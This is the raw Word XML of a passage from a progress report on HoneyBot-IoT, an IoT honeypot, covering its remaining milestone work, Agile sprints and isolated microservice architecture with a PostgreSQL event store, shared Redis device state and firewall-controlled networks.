            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00240A5B" w14:paraId="578730F2" w14:textId="77777777" w:rsidTr="00A5370F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="24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pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">PyTorch and TensorFlow</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="288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pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">scikit-learn + XGBoost (100%)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="408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pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Fewer heavy dependencies, smaller images.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00240A5B" w14:paraId="578730F2" w14:textId="77777777" w:rsidTr="00A5370F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="24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pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">ClamAV, VirusTotal and AlienVault OTX</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="288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pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">YARA with an offline IoT rule set</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="408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pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">No outbound look-ups from the honeynet; reputation feeds are 100% work.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1CF48B6F" w14:textId="54F0A1AE" w:rsidR="003272AD" w:rsidRPr="005C6601" w:rsidRDefault="005C6601" w:rsidP="00F0564A">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:bookmarkStart w:id="9004" w:name="_Toc69004"/>
      <w:r>
        <w:t xml:space="preserve">1.9 Remaining Work for the 100% Milestone</w:t>
      </w:r>
      <w:bookmarkEnd w:id="9004"/>
    </w:p>
    <w:p w14:paraId="0CD96F05" w14:textId="77777777" w:rsidR="003272AD" w:rsidRPr="00BE2A31" w:rsidRDefault="003272AD" w:rsidP="00F0564A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Module 8 AI/ML: XGBoost classifier for the six classes (5-fold cross-validation), Isolation Forest anomaly score, risk score and an LLM threat narrator, served from a separate ml_api container and evaluated against the rule baseline.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CD96F05" w14:textId="77777777" w:rsidR="003272AD" w:rsidRPr="00BE2A31" w:rsidRDefault="003272AD" w:rsidP="00F0564A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">AI threat-summary panel on the dashboard, fed by the Module 8 API.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CD96F05" w14:textId="77777777" w:rsidR="003272AD" w:rsidRPr="00BE2A31" w:rsidRDefault="003272AD" w:rsidP="00F0564A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Per-session PCAP recording, and external reputation feeds (GreyNoise, VirusTotal, OTX) through a controlled egress path.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CD96F05" w14:textId="77777777" w:rsidR="003272AD" w:rsidRPr="00BE2A31" w:rsidRDefault="003272AD" w:rsidP="00F0564A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Load testing (events per second) and live Telegram and SMTP delivery with real credentials.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CD96F05" w14:textId="77777777" w:rsidR="003272AD" w:rsidRPr="00BE2A31" w:rsidRDefault="003272AD" w:rsidP="00F0564A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Deployment on a public Linux VPS for real-internet data collection, after supervisor approval.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003272AD" w:rsidRPr="00BE2A31" w:rsidRDefault="003272AD" w:rsidP="00F0564A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Final report, user manual and project closure.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EC7BC08" w14:textId="2205920E" w:rsidR="005C6601" w:rsidRDefault="005C6601" w:rsidP="00F0564A">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:bookmarkStart w:id="9005" w:name="_Toc69005"/>
      <w:r>
        <w:t xml:space="preserve">2. Design Methodology and Software Process Model</w:t>
      </w:r>
      <w:bookmarkEnd w:id="9005"/>
    </w:p>
    <w:p w14:paraId="5F8CEDB5" w14:textId="77777777" w:rsidR="005C6601" w:rsidRDefault="005C6601" w:rsidP="00F0564A">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>HoneyBot-IoT is developed using Object-Oriented concept. The design model that can be applied for this approach is Activity Diagram, Class Diagram, Sequence Diagram, and State Transition Diagram. Each model is described below with only the most essential workflows and processes of the system being highlighted. Login, logout, and managing the profile are excluded since they are considered "trivial" operations, according to the standards of the template.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01803AB5" w14:textId="55BC348E" w:rsidR="005C6601" w:rsidRDefault="005C6601" w:rsidP="00F0564A">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Agile Process Model</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49F6C352" w14:textId="528B2451" w:rsidR="005C6601" w:rsidRDefault="005C6601" w:rsidP="00F0564A">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>This is why Agile is followed. It provides short incremental deliveries of working software, ongoing testing and feedback, and minimizes risk by finding problems early. Unlike Waterfall, which has fixed requirements initially, Agile is better for projects where design decisions are iteratively improved.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="589378CE" w14:textId="7E0FB37B" w:rsidR="003272AD" w:rsidRDefault="003272AD" w:rsidP="00F0564A">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Version 2.0 is the third Agile increment. Each two-week sprint ended with a runnable stack and a regression run of the test suite. The increment delivered so far is: Sprint 1 fixed the defects found in the 30% build; Sprint 2 added the unified event store, the Device State Manager and the RTSP honeypot; Sprint 3 added the Threat Intelligence Engine and the alert system; Sprint 4 added the new dashboard, deployment hardening and the test suite. The AI/ML module is the next increment.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003272AD" w:rsidRDefault="003272AD" w:rsidP="00F0564A">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Version 2.1 is the fourth increment and took two further sprints. Sprint 5 fixed the defects found in the 60% review, each with a regression test, and added malware capture, YARA and STIX 2.1 export. Sprint 6 replaced the dashboard with the React/TypeScript single-page application and WebSocket push, automated the firewall, and added backups, monitoring, PDF reports and the Module 8 dataset.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EC7BC08" w14:textId="2205920E" w:rsidR="005C6601" w:rsidRDefault="005C6601" w:rsidP="00F0564A">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:bookmarkStart w:id="9006" w:name="_Toc69006"/>
      <w:r>
        <w:t xml:space="preserve">3. System Architecture Overview</w:t>
      </w:r>
      <w:bookmarkEnd w:id="9006"/>
    </w:p>
    <w:p w14:paraId="589378CE" w14:textId="7E0FB37B" w:rsidR="003272AD" w:rsidRDefault="003272AD" w:rsidP="00F0564A">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">HoneyBot-IoT is composed of eight principal modules (M1–M8) deployed as an isolated Docker Compose stack. At the 70% milestone the stack runs 13 long-running services on four networks: five honeypot services face the attacker; PostgreSQL, Redis, the device-state simulator, the API, the intelligence engine and the backup service store, enrich and protect the data; a firewall service enforces isolation; and Nginx is the only entry point for the analyst. An optional monitoring profile adds Prometheus, Grafana and cAdvisor. Every attacker interaction is captured as an event in one PostgreSQL store, classified by the Threat Intelligence Engine, and pushed to the SOC dashboard in real time.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CF48B6F" w14:textId="54F0A1AE" w:rsidR="003272AD" w:rsidRPr="005C6601" w:rsidRDefault="005C6601" w:rsidP="00F0564A">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:bookmarkStart w:id="9007" w:name="_Toc69007"/>
      <w:r>
        <w:t xml:space="preserve">3.1 Architectural Design</w:t>
      </w:r>
      <w:bookmarkEnd w:id="9007"/>
    </w:p>
    <w:p w14:paraId="589378CE" w14:textId="7E0FB37B" w:rsidR="003272AD" w:rsidRDefault="003272AD" w:rsidP="00F0564A">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">HoneyBot-IoT follows a microservices architecture, and the dashboard follows a client–server design. The core functions (protocol emulation, logging, classification, alerting and presentation) are independent services that can be built, tested, restarted and scaled on their own.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="589378CE" w14:textId="7E0FB37B" w:rsidR="003272AD" w:rsidRDefault="003272AD" w:rsidP="00F0564A">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">The technical backbone.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Each service runs in its own container. The honeypots never write to the database directly: they create a common.db.Session object and call log_event(); one background writer thread per process batches the inserts, so a slow database never blocks an attacker connection. Two data hubs are used:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CD96F05" w14:textId="77777777" w:rsidR="003272AD" w:rsidRPr="00BE2A31" w:rsidRDefault="003272AD" w:rsidP="00F0564A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">PostgreSQL 16</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — long-term store for sessions, events, attackers, campaigns, detections, IOCs and alerts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CD96F05" w14:textId="77777777" w:rsidR="003272AD" w:rsidRPr="00BE2A31" w:rsidRDefault="003272AD" w:rsidP="00F0564A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Redis 7.2</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — the shared Device State (one hash per device, read and written by SSH, Telnet, HTTP and MQTT) and a publish/subscribe bus (honeybot:events, honeybot:detections, honeybot:state) that the API relays to the dashboard over a WebSocket.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="589378CE" w14:textId="7E0FB37B" w:rsidR="003272AD" w:rsidRDefault="003272AD" w:rsidP="00F0564A">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">One device, many protocols.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Because all honeypots read and change the same Redis state, an attacker who unlocks the smart lock through the HTTP REST API sees the change over MQTT (lock/status) and over SSH (cat /etc/lock_state). This cross-protocol coherence is what makes the honeypot high-interaction.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="589378CE" w14:textId="7E0FB37B" w:rsidR="003272AD" w:rsidRDefault="003272AD" w:rsidP="00F0564A">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">The dashboard.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> The analyst's browser loads a single-page dashboard from Nginx, reads data from the FastAPI REST API and receives live events, detections and device changes over a WebSocket, all through the same Nginx server (bcrypt basic auth, rate-limited).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="589378CE" w14:textId="7E0FB37B" w:rsidR="003272AD" w:rsidRDefault="003272AD" w:rsidP="00F0564A">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Why not a monolith?</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> The decision to use separate services instead of one program was based on three practical objectives:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CD96F05" w14:textId="77777777" w:rsidR="003272AD" w:rsidRPr="00BE2A31" w:rsidRDefault="003272AD" w:rsidP="00F0564A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Fault isolation:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> if the intelligence engine or the API fails, the honeypots keep capturing attacks; a crashed honeypot does not affect the other four.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CD96F05" w14:textId="77777777" w:rsidR="003272AD" w:rsidRPr="00BE2A31" w:rsidRDefault="003272AD" w:rsidP="00F0564A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Smart scaling:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> a protocol under heavy load (for example SSH) can be scaled horizontally on its own.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CD96F05" w14:textId="77777777" w:rsidR="003272AD" w:rsidRPr="00BE2A31" w:rsidRDefault="003272AD" w:rsidP="00F0564A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Clear evaluation:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> every service maps to one scope module and objective, so each can be tested and demonstrated separately.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6455269F" w14:textId="132AE54B" w:rsidR="005C6601" w:rsidRDefault="006238CF" w:rsidP="00F0564A">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="80" w:after="80" w:line="276" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6FAB2983" wp14:editId="14647A6F">
            <wp:extent cx="6035563" cy="6302286"/>
            <wp:effectExtent l="0" t="0" r="3810" b="381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85656002" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId12"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6035563" cy="6302286"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="14CF3682" w14:textId="7FA23AD5" w:rsidR="003272AD" w:rsidRDefault="005C6601" w:rsidP="006238CF">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Figure \* ARABIC ">
        <w:r>
          <w:t xml:space="preserve">1</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t xml:space="preserve">: Microservice Architecture (complete system, including the 100% AI/ML components)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="589378CE" w14:textId="7E0FB37B" w:rsidR="003272AD" w:rsidRDefault="003272AD" w:rsidP="00F0564A">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The figure below maps every implemented component to its network. The honeynet carries attacker traffic only, and every outbound connection from it is logged and dropped by the firewall service; the backnet is marked internal, so the database, Redis, API and intelligence engine have no route to the internet and no port on the host; Nginx on the frontnet is the only published dashboard port.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5760720" cy="4238244"/>
            <wp:docPr id="5" name="Picture 5"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="diag_architecture.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId31"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5760720" cy="4238244"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="14CF3682" w14:textId="7FA23AD5" w:rsidR="003272AD" w:rsidRDefault="005C6601" w:rsidP="006238CF">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Figure \* ARABIC ">
        <w:r>
          <w:t xml:space="preserve">2</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t xml:space="preserve">: Implemented Deployment Architecture at the 70% Milestone</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F37E5F8" w14:textId="77777777" w:rsidR="002C2A3E" w:rsidRPr="006428C0" w:rsidRDefault="002C2A3E" w:rsidP="002C2A3E">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="9008" w:name="_Toc69008"/>
      <w:r>
        <w:t xml:space="preserve">Technologies and Services</w:t>
      </w:r>
      <w:bookmarkEnd w:id="9008"/>
    </w:p>
    <w:p w14:paraId="7608910A" w14:textId="32DFBA61" w:rsidR="00F0564A" w:rsidRDefault="00F0564A" w:rsidP="00F0564A">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Table </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Table \* ARABIC ">
        <w:r>
          <w:t xml:space="preserve">8</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t xml:space="preserve">: Technologies, Components, and Security Mechanisms Used in the HoneyBot-IoT System Architecture (70%)</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="9176" w:type="dxa"/>
        <w:tblCellSpacing w:w="15" w:type="dxa"/>
        <w:tblCellMar>
          <w:top w:w="15" w:type="dxa"/>
          <w:left w:w="15" w:type="dxa"/>
          <w:bottom w:w="15" w:type="dxa"/>
          <w:right w:w="15" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1662"/>
        <w:gridCol w:w="3319"/>
        <w:gridCol w:w="2136"/>
        <w:gridCol w:w="2059"/>
      </w:tblGrid>
      <w:tr w:rsidR="002C2A3E" w:rsidRPr="005A43FB" w14:paraId="0FF4F59F" w14:textId="77777777" w:rsidTr="00020AAC">
        <w:trPr>
          <w:trHeight w:val="427"/>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="05CAFFA9" w14:textId="77777777" w:rsidR="002C2A3E" w:rsidRPr="005A43FB" w:rsidRDefault="002C2A3E" w:rsidP="00020AAC">
            <w:pPr>
              <w:spacing w:after="160" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Component</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="57BEBBDA" w14:textId="77777777" w:rsidR="002C2A3E" w:rsidRPr="005A43FB" w:rsidRDefault="002C2A3E" w:rsidP="00020AAC">
            <w:pPr>
              <w:spacing w:after="160" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Description</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4B3982A5" w14:textId="77777777" w:rsidR="002C2A3E" w:rsidRPr="005A43FB" w:rsidRDefault="002C2A3E" w:rsidP="00020AAC">
            <w:pPr>
              <w:spacing w:after="160" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Technology Used</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7855D5B8" w14:textId="77777777" w:rsidR="002C2A3E" w:rsidRPr="005A43FB" w:rsidRDefault="002C2A3E" w:rsidP="00020AAC">
            <w:pPr>
